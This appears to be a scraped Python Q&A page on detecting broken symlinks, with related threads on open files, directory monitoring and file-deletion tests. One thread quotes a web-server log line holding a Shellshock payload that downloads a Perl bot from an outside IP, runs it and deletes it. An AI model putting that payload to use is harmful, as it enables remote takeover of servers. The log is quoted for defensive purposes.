Find broken symlinks with Python - python
If I call os.stat() on a broken symlink, python throws an OSError exception. This makes it useful for finding them. However, there are a few other reasons that os.stat() might throw a similar exception. Is there a more precise way of detecting broken symlinks with Python under Linux?
A common Python saying is that it's easier to ask forgiveness than permission. While I'm not a fan of this statement in real life, it does apply in a lot of cases. Usually you want to avoid code that chains two system calls on the same file, because you never know what will happen to the file in between your two calls in your code.
A typical mistake is to write something like:
if os.path.exists(path):
os.unlink(path)
The second call (os.unlink) may fail if something else deleted it after your if test, raise an Exception, and stop the rest of your function from executing. (You might think this doesn't happen in real life, but we just fished another bug like that out of our codebase last week - and it was the kind of bug that left a few programmers scratching their head and claiming 'Heisenbug' for the last few months)
So, in your particular case, I would probably do:
try:
os.stat(path)
except OSError, e:
if e.errno == errno.ENOENT:
print 'path %s does not exist or is a broken symlink' % path
else:
raise e
The annoyance here is that stat returns the same error code for a symlink that just isn't there and a broken symlink.
So, I guess you have no choice than to break the atomicity, and do something like
if not os.path.exists(os.readlink(path)):
print 'path %s is a broken symlink' % path
This is not atomic but it works.
os.path.islink(filename) and not os.path.exists(filename)
Indeed by RTFM
(reading the fantastic manual) we see
os.path.exists(path)
Return True if path refers to an existing path. Returns False for broken symbolic links.
It also says:
On some platforms, this function may return False if permission is not granted to execute os.stat() on the requested file, even if the path physically exists.
So if you are worried about permissions, you should add other clauses.
os.lstat() may be helpful. If lstat() succeeds and stat() fails, then it's probably a broken link.
Can I mention testing for hardlinks without python? /bin/test has the FILE1 -ef FILE2 condition that is true when files share an inode.
Therefore, something like find . -type f -exec test \{} -ef /path/to/file \; -print works for hard link testing to a specific file.
Which brings me to reading man test and the mentions of -L and -h which both work on one file and return true if that file is a symbolic link, however that doesn't tell you if the target is missing.
I did find that head -0 FILE1 would return an exit code of 0 if the file can be opened and a 1 if it cannot, which in the case of a symbolic link to a regular file works as a test for whether it's target can be read.
os.path
You may try using realpath() to get what the symlink points to, then trying to determine if it's a valid file using is file.
(I'm not able to try that out at the moment, so you'll have to play around with it and see what you get)
I used this variant, When symlink is broken it will return false for the path.exists and true for path.islink, so combining this two facts we may use the following:
def kek(argum):
if path.exists("/root/" + argum) == False and path.islink("/root/" + argum) == True:
print("The path is a broken link, location: " + os.readlink("/root/" + argum))
else:
return "No broken links fond"
I'm not a python guy but it looks like os.readlink()? The logic I would use in perl is to use readlink() to find the target and the use stat() to test to see if the target exists.
Edit: I banged out some perl that demos readlink. I believe perl's stat and readlink and python's os.stat() and os.readlink()are both wrappers for the system calls, so this should translate reasonable well as proof of concept code:
wembley 0 /home/jj33/swap > cat p
my $f = shift;
while (my $l = readlink($f)) {
print "$f -> $l\n";
$f = $l;
}
if (!-e $f) {
print "$f doesn't exist\n";
}
wembley 0 /home/jj33/swap > ls -l | grep ^l
lrwxrwxrwx 1 jj33 users 17 Aug 21 14:30 link -> non-existant-file
lrwxrwxrwx 1 root users 31 Oct 10 2007 mm -> ../systems/mm/20071009-rewrite//
lrwxrwxrwx 1 jj33 users 2 Aug 21 14:34 mmm -> mm/
wembley 0 /home/jj33/swap > perl p mm
mm -> ../systems/mm/20071009-rewrite/
wembley 0 /home/jj33/swap > perl p mmm
mmm -> mm
mm -> ../systems/mm/20071009-rewrite/
wembley 0 /home/jj33/swap > perl p link
link -> non-existant-file
non-existant-file doesn't exist
wembley 0 /home/jj33/swap >
I had a similar problem: how to catch broken symlinks, even when they occur in some parent dir? I also wanted to log all of them (in an application dealing with a fairly large number of files), but without too many repeats.
Here is what I came up with, including unit tests.
fileutil.py:
import os
from functools import lru_cache
import logging
logger = logging.getLogger(__name__)
#lru_cache(maxsize=2000)
def check_broken_link(filename):
"""
Check for broken symlinks, either at the file level, or in the
hierarchy of parent dirs.
If it finds a broken link, an ERROR message is logged.
The function is cached, so that the same error messages are not repeated.
Args:
filename: file to check
Returns:
True if the file (or one of its parents) is a broken symlink.
False otherwise (i.e. either it exists or not, but no element
on its path is a broken link).
"""
if os.path.isfile(filename) or os.path.isdir(filename):
return False
if os.path.islink(filename):
# there is a symlink, but it is dead (pointing nowhere)
link = os.readlink(filename)
logger.error('broken symlink: {} -> {}'.format(filename, link))
return True
# ok, we have either:
# 1. a filename that simply doesn't exist (but the containing dir
does exist), or
# 2. a broken link in some parent dir
parent = os.path.dirname(filename)
if parent == filename:
# reached root
return False
return check_broken_link(parent)
Unit tests:
import logging
import shutil
import tempfile
import os
import unittest
from ..util import fileutil
class TestFile(unittest.TestCase):
def _mkdir(self, path, create=True):
d = os.path.join(self.test_dir, path)
if create:
os.makedirs(d, exist_ok=True)
return d
def _mkfile(self, path, create=True):
f = os.path.join(self.test_dir, path)
if create:
d = os.path.dirname(f)
os.makedirs(d, exist_ok=True)
with open(f, mode='w') as fp:
fp.write('hello')
return f
def _mklink(self, target, path):
f = os.path.join(self.test_dir, path)
d = os.path.dirname(f)
os.makedirs(d, exist_ok=True)
os.symlink(target, f)
return f
def setUp(self):
# reset the lru_cache of check_broken_link
fileutil.check_broken_link.cache_clear()
# create a temporary directory for our tests
self.test_dir = tempfile.mkdtemp()
# create a small tree of dirs, files, and symlinks
self._mkfile('a/b/c/foo.txt')
self._mklink('b', 'a/x')
self._mklink('b/c/foo.txt', 'a/f')
self._mklink('../..', 'a/b/c/y')
self._mklink('not_exist.txt', 'a/b/c/bad_link.txt')
bad_path = self._mkfile('a/XXX/c/foo.txt', create=False)
self._mklink(bad_path, 'a/b/c/bad_path.txt')
self._mklink('not_a_dir', 'a/bad_dir')
def tearDown(self):
# Remove the directory after the test
shutil.rmtree(self.test_dir)
def catch_check_broken_link(self, expected_errors, expected_result, path):
filename = self._mkfile(path, create=False)
with self.assertLogs(level='ERROR') as cm:
result = fileutil.check_broken_link(filename)
logging.critical('nothing') # trick: emit one extra message, so the with assertLogs block doesn't fail
error_logs = [r for r in cm.records if r.levelname is 'ERROR']
actual_errors = len(error_logs)
self.assertEqual(expected_result, result, msg=path)
self.assertEqual(expected_errors, actual_errors, msg=path)
def test_check_broken_link_exists(self):
self.catch_check_broken_link(0, False, 'a/b/c/foo.txt')
self.catch_check_broken_link(0, False, 'a/x/c/foo.txt')
self.catch_check_broken_link(0, False, 'a/f')
self.catch_check_broken_link(0, False, 'a/b/c/y/b/c/y/b/c/foo.txt')
def test_check_broken_link_notfound(self):
self.catch_check_broken_link(0, False, 'a/b/c/not_found.txt')
def test_check_broken_link_badlink(self):
self.catch_check_broken_link(1, True, 'a/b/c/bad_link.txt')
self.catch_check_broken_link(0, True, 'a/b/c/bad_link.txt')
def test_check_broken_link_badpath(self):
self.catch_check_broken_link(1, True, 'a/b/c/bad_path.txt')
self.catch_check_broken_link(0, True, 'a/b/c/bad_path.txt')
def test_check_broken_link_badparent(self):
self.catch_check_broken_link(1, True, 'a/bad_dir/c/foo.txt')
self.catch_check_broken_link(0, True, 'a/bad_dir/c/foo.txt')
# bad link, but shouldn't log a new error:
self.catch_check_broken_link(0, True, 'a/bad_dir/c')
# bad link, but shouldn't log a new error:
self.catch_check_broken_link(0, True, 'a/bad_dir')
if __name__ == '__main__':
unittest.main()
For Python 3, you can use the pathlib module. From its docs,
If the path points to a symlink, exists() returns whether the symlink points to an existing file or directory.
So this works too.
import pathlib
path = pathlib.Path("/path/to/somewhere")
if path.is_symlink() and not path.exists():
print(f"found dangling symlink at {path}")
Related
Check if a File is written or in use by another process
I try to find a solution for the following problems but can't find any good solution. I have a folder with subfolder and files in it. Some of the files may be in use by another process (the other process is writing data to the data (a .mdf file)). I simply want to check if the files are in use or not. Structure: A_Folder Setup Data1 .mdf-file1 .mdf-file2 Data2 Data3 Evaluation something like: def file_in_use(): *your solution* for file in folder: if file_in_use(file): print("file in use") break I'm Using Win10, PyCharm and a venv. I tried so far form other "solutions": psutil (works, but is too slow) open(), os.rename - won't work for me subprocess wont work either -cant find my filename: using the method from Amit Gupta from my link down below, file looks like this: "C:\Data\S_t_h\S-t-h\H001.mdf" basically I tried everything from this question: Check if a file is not open nor being used by another process from subprocess import check_output, Popen, PIPE src = r"C:\Data\S_t_h\S-t-h\H001.mdf" files_in_use = False def file_in_use(src): try: lsout = Popen(['lsof', src], stdout=PIPE, shell=False) check_output(["grep", src], stdin=lsout.stdout, shell=False) except: return False return True if file_in_use(src): files_in_use = True and im getting: FileNotFoundError: [WinError 2] The system cannot find the file specified this link suggesting setting winerror-2-the-system-cannot-find-the-file-specified-python shell=True Im getting "lsof" and "grep" cant be found or are wrong now. Here the psutil method that works for me, but is too slow (~10 Seconds) import psutil src = r"C:\Data\S_t_h\S-t-h\H001.mdf" def has_handle(src): for proc in psutil.process_iter(): try: for item in proc.open_files(): if src == item.path: return True except Exception: pass return False print(has_handle(src)) My Solution: Sorry for the delayed answer. It simply worked with: try: os.rename(src, src) return False except OSError: # file is in use return True I made it more complicated than it actually was i guess. But thank you guys anyway for your feedback and critizism.
How to unit-test for failed file deletion?
I have an os.remove() in my code that sometimes, when ran locally, fails due to OSError 13 - Permission Denied - thus I've set up a try-except. My automated testing (Travis CI) is ran on Linux VM instances, so I don't know how to make os.remove fail there for sake of coverage. What are my options - how do I force the except block to execute? Alternatively, how do I delete-protect a file with Python? Note: Removing it in the test code before calling the test method isn't an option; the method itself fetches files to be removed: from pathlib import Path paths = [str(x) for x in Path("directory/").iterdir() if 'abc' in x.stem] if len(paths) > 0: # if files are removed beforehand, len(paths) == 0 try: [os.remove(p) for p in paths] except: pass # stuff here
You can use unittest.mock.patch to patch os.remove and specify OSError as a side_effect: from unittest.mock import patch ... with patch('os.remove') as mock_remove: mock_remove.side_effect = OSError('Permission Denied') try: [os.remove(p) for p in paths] except OSError as e: pass # handle error here
Python: Check if a /dev/disk device exists
I am trying to write python script to find out if a disk device exists in /dev, but it always yield False. Any other way to do this? I tried >>> import os.path >>> os.path.isfile("/dev/bsd0") False >>> os.path.exists("/dev/bsd0") False $ ll /dev ... brw-rw---- 1 root disk 252, 0 Nov 12 21:28 bsd0 ...
Some unconventional situation is going on here. os.path.isfile() will return True for regular files, for device files this will be False. But as for os.path.exists(), documetation states that False may be returned if "permission is not granted to execute os.stat()". FYI the implementation of os.path.exists is: def exists(path): """Test whether a path exists. Returns False for broken symbolic links""" try: os.stat(path) except OSError: return False return True So, if os.stat is failing on you I don't see how ls could have succeeded (ls AFAIK also calls stat() syscall). So, check what os.stat('/dev/bsd0') is raising to understand why you're not being able to detect the existence of this particular device file with os.path.exists, because using os.path.exists() is supposed to be a valid method to check for the existence of a block device file.
This was not rigorously tested, but seems to work: import stat import os.stat def disk_exists(path): try: return stat.S_ISBLK(os.stat(path).st_mode) except: return False Results: disk_exists("/dev/bsd0") True disk_exists("/dev/bsd2") False
A python script to monitor a directory for new files
Similar questions have been asked but they either did not work for me or I failed to understand the answers. I run Apache2 webserver and host a few petty personal sites. I am being cyberstalked, or someone is attempting to hack me. The Apache2 access log shows 195.154.80.205 - - [05/Nov/2015:09:57:09 +0000] "GET /info.cgi HTTP/1.1" 404 464 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\r\n\r\nXSUCCESS!\";system(\"wget http://190.186.76.252/cox.pl -O /tmp/cox.pl;curl -O /tmp/cox.pl http://190.186.76.252/cox.pl;perl /tmp/cox.pl;rm -rf /tmp/cox.pl*\");'" which is clearly attempting (over and over again in my logs) to force my server to download 'cox.pl' then run 'cox.pl' then remove 'cox.pl'. I really want to know what is in cox.pl which could be a modified version of Cox-Data-Usage which is there on github. I would like a script that will constantly monitor my /tmp folder, and when a new file is added then copy that file to another directory for me to see what it is doing, or attempting to do at least. I know I could deny access etc. but I want to find out what these hackers are trying to do and see if I can gather intel about them.
The script in question can be easily downloaded, it contains ShellBOT by: devil__ so... guess ;-) You could use tutorial_notifier.py from pyinotify, but there's no need for this particular case. Just do curl http://190.186.76.252/cox.pl -o cox.pl.txt less cox.pl.txt to check the script. It looks like a good suite of hacks for Linux 2.4.17 - 2.6.17 and maybe BSD*, not that harmless to me, IRC related. It has nothing to do with Cox-Data-Usage.
The solution to the question wouldn't lie in a python script, this is more of a security issue for the likes of Fail2ban or similar to handle, but there is a way to monitor a directory for changes using Python Watchdog. (pip install watchdog) Taken from: https://pythonhosted.org/watchdog/quickstart.html#a-simple-example import sys import time import logging from watchdog.observers import Observer from watchdog.events import LoggingEventHandler if __name__ == "__main__": logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S') path = sys.argv[1] if len(sys.argv) > 1 else '.' event_handler = LoggingEventHandler() observer = Observer() observer.schedule(event_handler, path, recursive=True) observer.start() try: while True: time.sleep(1) except KeyboardInterrupt: observer.stop() observer.join() This will log all changes, (it can be configured for just file creation). If you want to rename new files to something else, you first need to know if the file is free or any modifications will fail, i.e it's not finished downloading/creation. That issue can mean that a call to that file can come before you've moved or renamed it programmatically. That's why this isn't a solution.
I got some solution, solution 1 (CPU usage: 27.9% approx= 30%): path_to_watch = "your/path" print('Your folder path is"',path,'"') before = dict ([(f, None) for f in os.listdir (path_to_watch)]) while 1: after = dict ([(f, None) for f in os.listdir (path_to_watch)]) added = [f for f in after if not f in before] if added: print("Added: ", ", ".join (added)) break else: before = after I have edited the code, the orginal code is available at http://timgolden.me.uk/python/win32_how_do_i/watch_directory_for_changes.html The original code was made in python 2x so you need to convert it in python 3. NOTE:- WHEN EVER YOU ADD ANY FILE IN PATH, IT PRINTS THE TEXT AND BREAKS, AND IF NO FILES ARE ADDED THEN IT WOULD CONTINUE TO RUN. Solution 2 (CPU usage: 23.4 approx=20%) import os path=r'C:\Users\Faraaz Anas Ammaar\Documents\Programming\Python\Eye-Daemon' b=os.listdir(path) path_len_org=len(b) def file_check(): while 1: b=os.listdir(path) path_len_final=len(b) if path_len_org<path_len_final: return "A file is added" elif path_len_org>path_len_final: return "A file is removed" else: pass file_check()
check what files are open in Python
I'm getting an error in a program that is supposed to run for a long time that too many files are open. Is there any way I can keep track of which files are open so I can print that list out occasionally and see where the problem is?
To list all open files in a cross-platform manner, I would recommend psutil. #!/usr/bin/env python import psutil for proc in psutil.process_iter(): print(proc.open_files()) The original question implicitly restricts the operation to the currently running process, which can be accessed through psutil's Process class. proc = psutil.Process() print(proc.open_files()) Lastly, you'll want to run the code using an account with the appropriate permissions to access this information or you may see AccessDenied errors.
I ended up wrapping the built-in file object at the entry point of my program. I found out that I wasn't closing my loggers. import io import sys import builtins import traceback from functools import wraps def opener(old_open): #wraps(old_open) def tracking_open(*args, **kw): file = old_open(*args, **kw) old_close = file.close #wraps(old_close) def close(): old_close() open_files.remove(file) file.close = close file.stack = traceback.extract_stack() open_files.add(file) return file return tracking_open def print_open_files(): print(f'### {len(open_files)} OPEN FILES: [{", ".join(f.name for f in open_files)}]', file=sys.stderr) for file in open_files: print(f'Open file {file.name}:\n{"".join(traceback.format_list(file.stack))}', file=sys.stderr) open_files = set() io.open = opener(io.open) builtins.open = opener(builtins.open)
On Linux, you can look at the contents of /proc/self/fd: $ ls -l /proc/self/fd/ total 0 lrwx------ 1 foo users 64 Jan 7 15:15 0 -> /dev/pts/3 lrwx------ 1 foo users 64 Jan 7 15:15 1 -> /dev/pts/3 lrwx------ 1 foo users 64 Jan 7 15:15 2 -> /dev/pts/3 lr-x------ 1 foo users 64 Jan 7 15:15 3 -> /proc/9527/fd
Although the solutions above that wrap opens are useful for one's own code, I was debugging my client to a third party library including some c extension code, so I needed a more direct way. The following routine works under darwin, and (I hope) other unix-like environments: def get_open_fds(): ''' return the number of open file descriptors for current process .. warning: will only work on UNIX-like os-es. ''' import subprocess import os pid = os.getpid() procs = subprocess.check_output( [ "lsof", '-w', '-Ff', "-p", str( pid ) ] ) nprocs = len( filter( lambda s: s and s[ 0 ] == 'f' and s[1: ].isdigit(), procs.split( '\n' ) ) ) return nprocs If anyone can extend to be portable to windows, I'd be grateful.
On Linux, you can use lsof to show all files opened by a process.
As said earlier, you can list fds on Linux in /proc/self/fd, here is a simple method to list them programmatically: import os import sys import errno def list_fds(): """List process currently open FDs and their target """ if not sys.platform.startswith('linux'): raise NotImplementedError('Unsupported platform: %s' % sys.platform) ret = {} base = '/proc/self/fd' for num in os.listdir(base): path = None try: path = os.readlink(os.path.join(base, num)) except OSError as err: # Last FD is always the "listdir" one (which may be closed) if err.errno != errno.ENOENT: raise ret[int(num)] = path return ret
On Windows, you can use Process Explorer to show all file handles owned by a process.
There are some limitations to the accepted response, in that it does not seem to count pipes. I had a python script that opened many sub-processes, and was failing to properly close standard input, output, and error pipes, which were used for communication. If I use the accepted response, it will fail to count these open pipes as open files, but (at least in Linux) they are open files and count toward the open file limit. The lsof -p solution suggested by sumid and shunc works in this situation, because it also shows you the open pipes.
Get a list of all open files. handle.exe is part of Microsoft's Sysinternals Suite. An alternative is the psutil Python module, but I find 'handle' will print out more files in use. Here is what I made. Kludgy code warning. #!/bin/python3 # coding: utf-8 """Build set of files that are in-use by processes. Requires 'handle.exe' from Microsoft SysInternals Suite. This seems to give a more complete list than using the psutil module. """ from collections import OrderedDict import os import re import subprocess # Path to handle executable handle = "E:/Installers and ZIPs/Utility/Sysinternalssuite/handle.exe" # Get output string from 'handle' handle_str = subprocess.check_output([handle]).decode(encoding='ASCII') """ Build list of lists. 1. Split string output, using '-' * 78 as section breaks. 2. Ignore first section, because it is executable version info. 3. Turn list of strings into a list of lists, ignoring first item (it's empty). """ work_list = [x.splitlines()[1:] for x in handle_str.split(sep='-' * 78)[1:]] """ Build OrderedDict of pid information. pid_dict['pid_num'] = ['pid_name','open_file_1','open_file_2', ...] """ pid_dict = OrderedDict() re1 = re.compile("(.*?\.exe) pid: ([0-9]+)") # pid name, pid number re2 = re.compile(".*File.*\s\s\s(.*)") # File name for x_list in work_list: key = '' file_values = [] m1 = re1.match(x_list[0]) if m1: key = m1.group(2) # file_values.append(m1.group(1)) # pid name first item in list for y_strings in x_list: m2 = re2.match(y_strings) if m2: file_values.append(m2.group(1)) pid_dict[key] = file_values # Make a set of all the open files values = [] for v in pid_dict.values(): values.extend(v) files_open = sorted(set(values)) txt_file = os.path.join(os.getenv('TEMP'), 'lsof_handle_files') with open(txt_file, 'w') as fd: for a in sorted(files_open): fd.write(a + '\n') subprocess.call(['notepad', txt_file]) os.remove(txt_file)
I'd guess that you are leaking file descriptors. You probably want to look through your code to make sure that you are closing all of the files that you open.
You can use the following script. It builds on Claudiu's answer. It addresses some of the issues and adds additional features: Prints a stack trace of where the file was opened Prints on program exit Keyword argument support Here's the code and a link to the gist, which is possibly more up to date. """ Collect stacktraces of where files are opened, and prints them out before the program exits. Example ======== monitor.py ---------- from filemonitor import FileMonitor FileMonitor().patch() f = open('/bin/ls') # end of monitor.py $ python monitor.py ---------------------------------------------------------------------------- path = /bin/ls > File "monitor.py", line 3, in <module> > f = open('/bin/ls') ---------------------------------------------------------------------------- Solution modified from: https://stackoverflow.com/questions/2023608/check-what-files-are-open-in-python """ from __future__ import print_function import __builtin__ import traceback import atexit import textwrap class FileMonitor(object): def __init__(self, print_only_open=True): self.openfiles = [] self.oldfile = __builtin__.file self.oldopen = __builtin__.open self.do_print_only_open = print_only_open self.in_use = False class File(self.oldfile): def __init__(this, *args, **kwargs): path = args[0] self.oldfile.__init__(this, *args, **kwargs) if self.in_use: return self.in_use = True self.openfiles.append((this, path, this._stack_trace())) self.in_use = False def close(this): self.oldfile.close(this) def _stack_trace(this): try: raise RuntimeError() except RuntimeError as e: stack = traceback.extract_stack()[:-2] return traceback.format_list(stack) self.File = File def patch(self): __builtin__.file = self.File __builtin__.open = self.File atexit.register(self.exit_handler) def unpatch(self): __builtin__.file = self.oldfile __builtin__.open = self.oldopen def exit_handler(self): indent = ' > ' terminal_width = 80 for file, path, trace in self.openfiles: if file.closed and self.do_print_only_open: continue print("-" * terminal_width) print(" {} = {}".format('path', path)) lines = ''.join(trace).splitlines() _updated_lines = [] for l in lines: ul = textwrap.fill(l, initial_indent=indent, subsequent_indent=indent, width=terminal_width) _updated_lines.append(ul) lines = _updated_lines print('\n'.join(lines)) print("-" * terminal_width) print()